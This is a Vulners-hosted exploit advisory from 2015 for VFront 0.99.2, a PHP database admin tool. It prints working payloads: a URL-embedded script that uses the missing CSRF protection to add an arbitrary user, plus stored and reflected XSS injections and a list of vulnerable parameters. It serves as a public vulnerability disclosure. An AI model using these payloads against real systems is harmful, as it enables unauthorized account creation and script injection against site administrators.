Vulners
Lucene search
VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Title: CSRF & Persistent XSS
# Google Dork: intitle: CSRF & Persistent XSS
# Date: 2015-06-02
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: www.vfront.org
# Software Link: www.vfront.org
# Version: 0.99.2
# Tested on: windows 7
# Category: webapps
Product:
===================================================================================
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS
Vulnerability Detail(s):
=======================
CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.
Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
Exploit code(s):
===============
CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%[email protected]%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>
Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
Disclosure Timeline:
===================================
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure
Severity Level:
===================================
High
Description:
==========================================================
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] vfront-0.99.2
Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
id_campo
op
Affected Area(s): [+] Admin & MySQL DB
===============================================================
(hyp3rlinx)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2015 00:00Current
7.4High risk
Vulners AI Score7.4